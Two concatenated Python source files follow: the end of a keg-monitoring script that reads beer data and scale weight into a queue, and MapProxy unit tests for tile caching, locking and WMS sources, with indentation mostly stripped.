if row is not None:
# Update keg variables
self.kegdata[u'name'] = row['Name'] if 'Name' in row else u''
self.kegdata[u'description'] = row['Description'] if 'Description' in row else u''
self.kegdata[u'abv'] = row['ABV'] if 'ABV' in row else 0.0
self.kegdata[u'ibu'] = row['IBU'] if 'IBU' in row else 0.0
self.kegdata[u'originalgravity'] = row['OriginalGravity'] if 'OriginalGravity' in row else 0.0
self.kegdata[u'finalgravity'] = row['FinalGravity'] if 'FinalGravity' in row else 0.0
self.kegdata[u'color'] = row['Color'] if 'Color' in row else 0.0
self.kegdata[u'kegged'] = row['Kegged'] if 'Kegged' in row else datetime.datetime.fromtimestamp(0)
self.kegdata[u'tapped'] = row['Tapped'] if 'Tapped' in row else datetime.datetime.fromtimestamp(0)
self.kegdata[u'brewed'] = row['Brewed'] if 'Brewed' in row else datetime.datetime.fromtimestamp(0)
self.kegdata[u'notes'] = row['Notes'] if 'Notes' in row else u''
else:
self.kegdata[u'name'] = u''
self.kegdata[u'description'] = u''
self.kegdata[u'abv'] = 0.0
self.kegdata[u'ibu'] = 0.0
self.kegdata[u'originalgravity'] = 0.0
self.kegdata[u'finalgravity'] = 0.0
self.kegdata[u'color'] = 0.0
self.kegdata[u'kegged'] = datetime.datetime.fromtimestamp(0)
self.kegdata[u'tapped'] = datetime.datetime.fromtimestamp(0)
self.kegdata[u'brewed'] = datetime.datetime.fromtimestamp(0)
self.kegdata[u'notes'] = u''
self.kegdata[u'weight'] = int(self.hx.get_weight(10))
print "Weight is {0} in oz".format(self.kegdata[u'weight'])
self.hx.power_down()
self.hx.power_up()
self.validatekegvars(self.kegdata)
def sendUpdate(self):
# Figure out what has changed and then send just those values across dataqueue
md = { }
for k, v in self.kegdata.iteritems():
pv = self.kegdata_prev[k] if k in self.kegdata_prev else None
if pv != v:
md[k] = v
# Send md to queue if anything has changed
if len(md) > 0:
# # elapsed is special as it needs to be sent to guarantee that the timer gets updated correctly. Even if it hasn't changed, send it anyway
# md[u'elapsed'] = self.kegdata[u'elapsed']
self.dataqueue.put(md)
# Update kegdata_prev
self.kegdata_prev = self.kegdata.copy()
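# --- Illustrative sketch (not part of the class) ------------------------------
# sendUpdate() pushes only the keys whose values changed since the previous
# poll. The same diff written as a small stand-alone helper on plain dicts
# (names here are illustrative only):
def _changed_keys(current, previous):
    return dict((k, v) for k, v in current.items() if previous.get(k) != v)

# _changed_keys({"weight": 12, "name": "IPA"}, {"weight": 11, "name": "IPA"})
# -> {"weight": 12}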
if __name__ == u'__main__':
logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s', filename=u'kegdata.log', level=logging.DEBUG)
logging.getLogger().addHandler(logging.StreamHandler())
try:
opts, args = getopt.getopt(sys.argv[1:],u"hs:p:w:t:",[u"server=",u"port=",u"pwd=",u"tap="])
except getopt.GetoptError:
print u'kegdata.py -s <server> -p <port> -w <password> -t <tap>'
sys.exit(2)
# Set defaults
server = u'localhost'
port = 3306
pwd= u''
tap = 1
for opt, arg in opts:
if opt == u'-h':
print u'kegdata.py -s <server> -p <port> -w <password> -t <tap>'
sys.exit()
elif opt in (u"-s", u"--server"):
server = arg
elif opt in (u"-p", u"--port"):
port = int(arg)
elif opt in (u"-w", u"--pwd"):
pwd = arg
elif opt in (u"-t", u"--tap"):
tap = int(arg)
print "kegdata test\n server: {0}\n port : {1}\n tap : {2}\n".format(server,port,tap)
q = Queue.Queue()
kd = kegdata(q, server, port, pwd, tap)
try:
start = time.time()
while True:
if start+120 < time.time():
break
try:
item = q.get(timeout=1000)
print u"++++++++++"
for k,v in item.iteritems():
print u"[{0}] '{1}' type {2}".format(k,v,type(v))
print u"++++++++++"
print
q.task_done()
except Queue.Empty:
pass
except KeyboardInterrupt:
print u''
pass
print u"Exiting..."
|
test_cache.py
|
# This file is part of the MapProxy project.
# Copyright (C) 2010 Omniscale <http://omniscale.de>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import with_statement
import os
import re
import time
import threading
import shutil
import tempfile
import base64
from io import BytesIO
from mapproxy.compat.image import Image
from mapproxy.layer import (
CacheMapLayer,
SRSConditional,
ResolutionConditional,
DirectMapLayer,
MapExtent,
MapQuery,
)
from mapproxy.source import InvalidSourceQuery, SourceError
from mapproxy.client.wms import WMSClient
from mapproxy.source.wms import WMSSource
from mapproxy.source.tile import TiledSource
from mapproxy.cache.base import TileLocker
from mapproxy.cache.file import FileCache
from mapproxy.cache.tile import Tile, TileManager
from mapproxy.grid import TileGrid, resolution_range
from mapproxy.srs import SRS
from mapproxy.client.http import HTTPClient
from mapproxy.image import ImageSource
from mapproxy.image.opts import ImageOptions
from mapproxy.layer import BlankImage, MapLayer, MapBBOXError
from mapproxy.request.wms import WMS111MapRequest
from mapproxy.util.coverage import BBOXCoverage
from mapproxy.test.image import create_debug_img, is_png, tmp_image
from mapproxy.test.http import assert_query_eq, wms_query_eq, query_eq, mock_httpd
from collections import defaultdict
from nose.tools import eq_, raises, assert_not_equal, assert_raises
TEST_SERVER_ADDRESS = ('127.0.0.1', 56413)
GLOBAL_GEOGRAPHIC_EXTENT = MapExtent((-180, -90, 180, 90), SRS(4326))
tmp_lock_dir = None
def setup():
global tmp_lock_dir
tmp_lock_dir = tempfile.mkdtemp()
def teardown():
shutil.rmtree(tmp_lock_dir)
class counting_set(object):
def __init__(self, items):
self.data = defaultdict(int)
for item in items:
self.data[item] += 1
def add(self, item):
self.data[item] += 1
def __repr__(self):
return 'counting_set(%r)' % dict(self.data)
def __eq__(self, other):
return self.data == other.data
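# Quick illustration (not part of the test suite): counting_set compares by item
# multiplicity, which is what the locking tests below rely on, e.g.
#   counting_set(['a', 'b', 'a']) == counting_set(['a', 'a', 'b'])  -> True
#   counting_set(['a', 'b']) == counting_set(['a', 'a', 'b'])       -> False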
class MockTileClient(object):
def __init__(self):
self.requested_tiles = []
def get_tile(self, tile_coord, format=None):
self.requested_tiles.append(tile_coord)
return ImageSource(create_debug_img((256, 256)))
class TestTiledSourceGlobalGeodetic(object):
def setup(self):
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.client = MockTileClient()
self.source = TiledSource(self.grid, self.client)
def test_match(self):
self.source.get_map(MapQuery([-180, -90, 0, 90], (256, 256), SRS(4326)))
self.source.get_map(MapQuery([0, -90, 180, 90], (256, 256), SRS(4326)))
eq_(self.client.requested_tiles, [(0, 0, 1), (1, 0, 1)])
@raises(InvalidSourceQuery)
def test_wrong_size(self):
self.source.get_map(MapQuery([-180, -90, 0, 90], (512, 256), SRS(4326)))
@raises(InvalidSourceQuery)
def test_wrong_srs(self):
self.source.get_map(MapQuery([-180, -90, 0, 90], (512, 256), SRS(900913)))
class MockFileCache(FileCache):
def __init__(self, *args, **kw):
super(MockFileCache, self).__init__(*args, **kw)
self.stored_tiles = set()
self.loaded_tiles = counting_set([])
def store_tile(self, tile):
assert tile.coord not in self.stored_tiles
self.stored_tiles.add(tile.coord)
if self.cache_dir != '/dev/null':
FileCache.store_tile(self, tile)
def load_tile(self, tile, with_metadata=False):
self.loaded_tiles.add(tile.coord)
return FileCache.load_tile(self, tile, with_metadata)
def is_cached(self, tile):
return tile.coord in self.stored_tiles
def create_cached_tile(tile, cache, timestamp=None):
loc = cache.tile_location(tile, create_dir=True)
with open(loc, 'wb') as f:
f.write(b'foo')
if timestamp:
os.utime(loc, (timestamp, timestamp))
class TestTileManagerStaleTiles(object):
def setup(self):
self.cache_dir = tempfile.mkdtemp()
self.file_cache = FileCache(cache_dir=self.cache_dir, file_ext='png')
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.client = MockTileClient()
self.source = TiledSource(self.grid, self.client)
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png', locker=self.locker)
def teardown(self):
shutil.rmtree(self.cache_dir)
def test_is_stale_missing(self):
assert not self.tile_mgr.is_stale(Tile((0, 0, 1)))
def test_is_stale_not_expired(self):
create_cached_tile(Tile((0, 0, 1)), self.file_cache)
assert not self.tile_mgr.is_stale(Tile((0, 0, 1)))
def test_is_stale_expired(self):
create_cached_tile(Tile((0, 0, 1)), self.file_cache, timestamp=time.time()-3600)
self.tile_mgr._expire_timestamp = time.time()
assert self.tile_mgr.is_stale(Tile((0, 0, 1)))
class TestTileManagerRemoveTiles(object):
def setup(self):
self.cache_dir = tempfile.mkdtemp()
self.file_cache = FileCache(cache_dir=self.cache_dir, file_ext='png')
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.client = MockTileClient()
self.source = TiledSource(self.grid, self.client)
self.image_opts = ImageOptions(format='image/png')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
image_opts=self.image_opts,
locker=self.locker)
def teardown(self):
shutil.rmtree(self.cache_dir)
def test_remove_missing(self):
self.tile_mgr.remove_tile_coords([(0, 0, 0), (0, 0, 1)])
def test_remove_existing(self):
create_cached_tile(Tile((0, 0, 1)), self.file_cache)
assert self.tile_mgr.is_cached(Tile((0, 0, 1)))
self.tile_mgr.remove_tile_coords([(0, 0, 0), (0, 0, 1)])
assert not self.tile_mgr.is_cached(Tile((0, 0, 1)))
class TestTileManagerTiledSource(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.client = MockTileClient()
self.source = TiledSource(self.grid, self.client)
self.image_opts = ImageOptions(format='image/png')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
image_opts=self.image_opts,
locker=self.locker,
)
def test_create_tiles(self):
self.tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))])
eq_(self.file_cache.stored_tiles, set([(0, 0, 1), (1, 0, 1)]))
eq_(sorted(self.client.requested_tiles), [(0, 0, 1), (1, 0, 1)])
class TestTileManagerDifferentSourceGrid(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.source_grid = TileGrid(SRS(4326), bbox=[0, -90, 180, 90])
self.client = MockTileClient()
self.source = TiledSource(self.source_grid, self.client)
self.image_opts = ImageOptions(format='image/png')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
image_opts=self.image_opts,
locker=self.locker,
)
def test_create_tiles(self):
self.tile_mgr.creator().create_tiles([Tile((1, 0, 1))])
eq_(self.file_cache.stored_tiles, set([(1, 0, 1)]))
eq_(self.client.requested_tiles, [(0, 0, 0)])
@raises(InvalidSourceQuery)
def test_create_tiles_out_of_bounds(self):
self.tile_mgr.creator().create_tiles([Tile((0, 0, 0))])
class MockSource(MapLayer):
def __init__(self, *args):
MapLayer.__init__(self, *args)
self.requested = []
def _image(self, size):
return create_debug_img(size)
def get_map(self, query):
self.requested.append((query.bbox, query.size, query.srs))
return ImageSource(self._image(query.size))
class TestTileManagerSource(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.source = MockSource()
self.image_opts = ImageOptions(format='image/png')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
image_opts=self.image_opts,
locker=self.locker,
)
def test_create_tile(self):
self.tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))])
eq_(self.file_cache.stored_tiles, set([(0, 0, 1), (1, 0, 1)]))
eq_(sorted(self.source.requested),
[((-180.0, -90.0, 0.0, 90.0), (256, 256), SRS(4326)),
((0.0, -90.0, 180.0, 90.0), (256, 256), SRS(4326))])
class MockWMSClient(object):
def __init__(self):
self.requested = []
def retrieve(self, query, format):
self.requested.append((query.bbox, query.size, query.srs))
return create_debug_img(query.size)
class TestTileManagerWMSSource(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.client = MockWMSClient()
self.source = WMSSource(self.client)
self.image_opts = ImageOptions(format='image/png')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
meta_size=[2, 2], meta_buffer=0, image_opts=self.image_opts,
locker=self.locker,
)
def test_same_lock_for_meta_tile(self):
eq_(self.tile_mgr.lock(Tile((0, 0, 1))).lock_file,
self.tile_mgr.lock(Tile((1, 0, 1))).lock_file
)
def test_locks_for_meta_tiles(self):
assert_not_equal(self.tile_mgr.lock(Tile((0, 0, 2))).lock_file,
self.tile_mgr.lock(Tile((2, 0, 2))).lock_file
)
def test_create_tile_first_level(self):
self.tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))])
eq_(self.file_cache.stored_tiles, set([(0, 0, 1), (1, 0, 1)]))
eq_(self.client.requested,
[((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))])
def test_create_tile(self):
self.tile_mgr.creator().create_tiles([Tile((0, 0, 2))])
eq_(self.file_cache.stored_tiles,
set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2)]))
eq_(sorted(self.client.requested),
[((-180.0, -90.0, 0.0, 90.0), (512, 512), SRS(4326))])
def test_create_tiles(self):
self.tile_mgr.creator().create_tiles([Tile((0, 0, 2)), Tile((2, 0, 2))])
eq_(self.file_cache.stored_tiles,
set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2),
(2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2)]))
eq_(sorted(self.client.requested),
[((-180.0, -90.0, 0.0, 90.0), (512, 512), SRS(4326)),
((0.0, -90.0, 180.0, 90.0), (512, 512), SRS(4326))])
def test_load_tile_coords(self):
tiles = self.tile_mgr.load_tile_coords(((0, 0, 2), (2, 0, 2)))
eq_(tiles[0].coord, (0, 0, 2))
assert isinstance(tiles[0].source, ImageSource)
eq_(tiles[1].coord, (2, 0, 2))
assert isinstance(tiles[1].source, ImageSource)
eq_(self.file_cache.stored_tiles,
set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2),
(2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2)]))
eq_(sorted(self.client.requested),
[((-180.0, -90.0, 0.0, 90.0), (512, 512), SRS(4326)),
((0.0, -90.0, 180.0, 90.0), (512, 512), SRS(4326))])
class TestTileManagerWMSSourceMinimalMetaRequests(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.client = MockWMSClient()
self.source = WMSSource(self.client)
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
meta_size=[2, 2], meta_buffer=10, minimize_meta_requests=True,
locker=self.locker,
)
def test_create_tile_single(self):
# not enabled for single tile requests
self.tile_mgr.creator().create_tiles([Tile((0, 0, 2))])
eq_(self.file_cache.stored_tiles,
set([(0, 0, 2), (0, 1, 2), (1, 0, 2), (1, 1, 2)]))
eq_(sorted(self.client.requested),
[((-180.0, -90.0, 3.515625, 90.0), (522, 512), SRS(4326))])
def test_create_tile_multiple(self):
self.tile_mgr.creator().create_tiles([Tile((4, 0, 3)), Tile((4, 1, 3)), Tile((4, 2, 3))])
eq_(self.file_cache.stored_tiles,
set([(4, 0, 3), (4, 1, 3), (4, 2, 3)]))
eq_(sorted(self.client.requested),
[((-1.7578125, -90, 46.7578125, 46.7578125), (276, 778), SRS(4326))])
def test_create_tile_multiple_fragmented(self):
self.tile_mgr.creator().create_tiles([Tile((4, 0, 3)), Tile((5, 2, 3))])
eq_(self.file_cache.stored_tiles,
set([(4, 0, 3), (4, 1, 3), (4, 2, 3), (5, 0, 3), (5, 1, 3), (5, 2, 3)]))
eq_(sorted(self.client.requested),
[((-1.7578125, -90, 91.7578125, 46.7578125), (532, 778), SRS(4326))])
class SlowMockSource(MockSource):
supports_meta_tiles = True
def get_map(self, query):
time.sleep(0.1)
return MockSource.get_map(self, query)
class TestTileManagerLocking(object):
def setup(self):
self.tile_dir = tempfile.mkdtemp()
self.file_cache = MockFileCache(self.tile_dir, 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.source = SlowMockSource()
self.image_opts = ImageOptions(format='image/png')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
meta_size=[2, 2], meta_buffer=0, image_opts=self.image_opts,
locker=self.locker,
)
def test_get_single(self):
self.tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))])
eq_(self.file_cache.stored_tiles, set([(0, 0, 1), (1, 0, 1)]))
eq_(self.source.requested,
[((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))])
def test_concurrent(self):
def do_it():
self.tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))])
threads = [threading.Thread(target=do_it) for _ in range(3)]
[t.start() for t in threads]
[t.join() for t in threads]
eq_(self.file_cache.stored_tiles, set([(0, 0, 1), (1, 0, 1)]))
eq_(self.file_cache.loaded_tiles, counting_set([(0, 0, 1), (1, 0, 1), (0, 0, 1), (1, 0, 1)]))
eq_(self.source.requested,
[((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))])
assert os.path.exists(self.file_cache.tile_location(Tile((0, 0, 1))))
def teardown(self):
shutil.rmtree(self.tile_dir)
class TestTileManagerMultipleSources(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.source_base = MockSource()
self.source_overlay = MockSource()
self.image_opts = ImageOptions(format='image/png')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache,
[self.source_base, self.source_overlay], 'png',
image_opts=self.image_opts,
locker=self.locker,
)
self.layer = CacheMapLayer(self.tile_mgr)
def test_get_single(self):
self.tile_mgr.creator().create_tiles([Tile((0, 0, 1))])
eq_(self.file_cache.stored_tiles, set([(0, 0, 1)]))
eq_(self.source_base.requested,
[((-180.0, -90.0, 0.0, 90.0), (256, 256), SRS(4326))])
eq_(self.source_overlay.requested,
[((-180.0, -90.0, 0.0, 90.0), (256, 256), SRS(4326))])
class SolidColorMockSource(MockSource):
def __init__(self, color='#ff0000'):
MockSource.__init__(self)
self.color = color
def _image(self, size):
return Image.new('RGB', size, self.color)
class TestTileManagerMultipleSourcesWithMetaTiles(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.source_base = SolidColorMockSource(color='#ff0000')
self.source_base.supports_meta_tiles = True
self.source_overlay = MockSource()
self.source_overlay.supports_meta_tiles = True
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache,
[self.source_base, self.source_overlay], 'png',
meta_size=[2, 2], meta_buffer=0,
locker=self.locker,
)
def test_merged_tiles(self):
tiles = self.tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))])
eq_(self.file_cache.stored_tiles, set([(0, 0, 1), (1, 0, 1)]))
eq_(self.source_base.requested,
[((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))])
eq_(self.source_overlay.requested,
[((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))])
hist = tiles[0].source.as_image().histogram()
# lots of red (base), but not everything (overlay)
assert 55000 < hist[255] < 60000 # red = 0xff
assert 55000 < hist[256] # green = 0x00
assert 55000 < hist[512] # blue = 0x00
@raises(ValueError)
def test_sources_with_mixed_support_for_meta_tiles(self):
self.source_base.supports_meta_tiles = False
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache,
[self.source_base, self.source_overlay], 'png',
meta_size=[2, 2], meta_buffer=0,
locker=self.locker)
def test_sources_with_no_support_for_meta_tiles(self):
self.source_base.supports_meta_tiles = False
self.source_overlay.supports_meta_tiles = False
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache,
[self.source_base, self.source_overlay], 'png',
meta_size=[2, 2], meta_buffer=0,
locker=self.locker)
assert self.tile_mgr.meta_grid is None
default_image_opts = ImageOptions(resampling='bicubic')
class TestCacheMapLayer(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.client = MockWMSClient()
self.source = WMSSource(self.client)
self.image_opts = ImageOptions(resampling='nearest')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
meta_size=[2, 2], meta_buffer=0, image_opts=self.image_opts,
locker=self.locker)
self.layer = CacheMapLayer(self.tile_mgr, image_opts=default_image_opts)
def test_get_map_small(self):
result = self.layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png'))
eq_(self.file_cache.stored_tiles, set([(0, 0, 1), (1, 0, 1)]))
eq_(result.size, (300, 150))
def test_get_map_large(self):
# gets next resolution layer
result = self.layer.get_map(MapQuery((-180, -90, 180, 90), (600, 300), SRS(4326), 'png'))
eq_(self.file_cache.stored_tiles,
set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2),
(2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2)]))
eq_(result.size, (600, 300))
def test_transformed(self):
result = self.layer.get_map(MapQuery(
(-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500),
SRS(900913), 'png'))
eq_(self.file_cache.stored_tiles,
set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2),
(2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2)]))
eq_(result.size, (500, 500))
def test_single_tile_match(self):
result = self.layer.get_map(MapQuery(
(0.001, 0, 90, 90), (256, 256), SRS(4326), 'png', tiled_only=True))
eq_(self.file_cache.stored_tiles,
set([(3, 0, 2), (2, 0, 2), (3, 1, 2), (2, 1, 2)]))
eq_(result.size, (256, 256))
@raises(MapBBOXError)
def test_single_tile_no_match(self):
self.layer.get_map(MapQuery(
(0.1, 0, 90, 90), (256, 256), SRS(4326), 'png', tiled_only=True))
def test_get_map_with_res_range(self):
res_range = resolution_range(1000, 10)
self.source = WMSSource(self.client, res_range=res_range)
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
meta_size=[2, 2], meta_buffer=0, image_opts=self.image_opts,
locker=self.locker)
self.layer = CacheMapLayer(self.tile_mgr, image_opts=default_image_opts)
try:
result = self.layer.get_map(MapQuery(
(-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500),
SRS(900913), 'png'))
except BlankImage:
pass
else:
assert False, 'expected BlankImage exception'
eq_(self.file_cache.stored_tiles, set())
result = self.layer.get_map(MapQuery(
(0, 0, 10000, 10000), (50, 50),
SRS(900913), 'png'))
eq_(self.file_cache.stored_tiles,
set([(512, 257, 10), (513, 256, 10), (512, 256, 10), (513, 257, 10)]))
eq_(result.size, (50, 50))
class TestCacheMapLayerWithExtent(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.client = MockWMSClient()
self.source = WMSSource(self.client)
self.image_opts = ImageOptions(resampling='nearest', format='png')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
meta_size=[1, 1], meta_buffer=0, image_opts=self.image_opts,
locker=self.locker)
self.layer = CacheMapLayer(self.tile_mgr, image_opts=default_image_opts)
self.layer.extent = BBOXCoverage([0, 0, 90, 45], SRS(4326)).extent
def test_get_outside_extent(self):
assert_raises(BlankImage, self.layer.get_map, MapQuery((-180, -90, 0, 0), (300, 150), SRS(4326), 'png'))
def test_get_map_small(self):
result = self.layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png'))
eq_(self.file_cache.stored_tiles, set([(1, 0, 1)]))
# source requests one tile (no meta-tiling configured)
eq_(self.client.requested, [((0.0, -90.0, 180.0, 90.0), (256, 256), SRS('EPSG:4326'))])
eq_(result.size, (300, 150))
def test_get_map_small_with_source_extent(self):
self.source.extent = BBOXCoverage([0, 0, 90, 45], SRS(4326)).extent
result = self.layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png'))
eq_(self.file_cache.stored_tiles, set([(1, 0, 1)]))
# source requests one tile (no meta-tiling configured) limited to source.extent
eq_(self.client.requested, [((0, 0, 90, 45), (128, 64), (SRS(4326)))])
eq_(result.size, (300, 150))
class TestDirectMapLayer(object):
def setup(self):
self.client = MockWMSClient()
self.source = WMSSource(self.client)
self.layer = DirectMapLayer(self.source, GLOBAL_GEOGRAPHIC_EXTENT)
def test_get_map(self):
result = self.layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png'))
eq_(self.client.requested, [((-180, -90, 180, 90), (300, 150), SRS(4326))])
eq_(result.size, (300, 150))
def test_get_map_mercator(self):
result = self.layer.get_map(MapQuery(
(-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500),
SRS(900913), 'png'))
eq_(self.client.requested,
[((-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500),
SRS(900913))])
eq_(result.size, (500, 500))
class TestDirectMapLayerWithSupportedSRS(object):
def setup(self):
self.client = MockWMSClient()
self.source = WMSSource(self.client)
self.layer = DirectMapLayer(self.source, GLOBAL_GEOGRAPHIC_EXTENT)
def test_get_map(self):
result = self.layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png'))
eq_(self.client.requested, [((-180, -90, 180, 90), (300, 150), SRS(4326))])
eq_(result.size, (300, 150))
def test_get_map_mercator(self):
result = self.layer.get_map(MapQuery(
(-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500),
SRS(900913), 'png'))
eq_(self.client.requested,
[((-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500),
SRS(900913))])
eq_(result.size, (500, 500))
class MockHTTPClient(object):
def __init__(self):
self.requested = []
def open(self, url, data=None):
self.requested.append(url)
w = int(re.search(r'width=(\d+)', url, re.IGNORECASE).group(1))
h = int(re.search(r'height=(\d+)', url, re.IGNORECASE).group(1))
format = re.search(r'format=image(/|%2F)(\w+)', url, re.IGNORECASE).group(2)
transparent = re.search(r'transparent=(\w+)', url, re.IGNORECASE)
transparent = True if transparent and transparent.group(1).lower() == 'true' else False
result = BytesIO()
create_debug_img((int(w), int(h)), transparent).save(result, format=format)
result.seek(0)
result.headers = {'Content-type': 'image/'+format}
return result
class TestWMSSourceTransform(object):
def setup(self):
self.http_client = MockHTTPClient()
self.req_template = WMS111MapRequest(url='http://localhost/service?', param={
'format': 'image/png', 'layers': 'foo'
})
self.client = WMSClient(self.req_template, http_client=self.http_client)
self.source = WMSSource(self.client, supported_srs=[SRS(4326)],
image_opts=ImageOptions(resampling='bilinear'))
def test_get_map(self):
self.source.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326)))
assert query_eq(self.http_client.requested[0], "http://localhost/service?"
"layers=foo&width=300&version=1.1.1&bbox=-180,-90,180,90&service=WMS"
"&format=image%2Fpng&styles=&srs=EPSG%3A4326&request=GetMap&height=150")
def test_get_map_transformed(self):
self.source.get_map(MapQuery(
(556597, 4865942, 1669792, 7361866), (300, 150), SRS(900913)))
assert wms_query_eq(self.http_client.requested[0], "http://localhost/service?"
"layers=foo&width=300&version=1.1.1"
"&bbox=4.99999592195,39.9999980766,14.999996749,54.9999994175&service=WMS"
"&format=image%2Fpng&styles=&srs=EPSG%3A4326&request=GetMap&height=450")
class TestWMSSourceWithClient(object):
def setup(self):
self.req_template = WMS111MapRequest(
url='http://%s:%d/service?' % TEST_SERVER_ADDRESS,
param={'format': 'image/png', 'layers': 'foo'})
self.client = WMSClient(self.req_template)
self.source = WMSSource(self.client)
def test_get_map(self):
with tmp_image((512, 512)) as img:
expected_req = ({'path': r'/service?LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng'
'&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326&styles='
'&VERSION=1.1.1&BBOX=0.0,10.0,10.0,20.0&WIDTH=512'},
{'body': img.read(), 'headers': {'content-type': 'image/png'}})
with mock_httpd(TEST_SERVER_ADDRESS, [expected_req]):
q = MapQuery((0.0, 10.0, 10.0, 20.0), (512, 512), SRS(4326))
result = self.source.get_map(q)
assert isinstance(result, ImageSource)
eq_(result.size, (512, 512))
assert is_png(result.as_buffer(seekable=True))
eq_(result.as_image().size, (512, 512))
def test_get_map_non_image_content_type(self):
with tmp_image((512, 512)) as img:
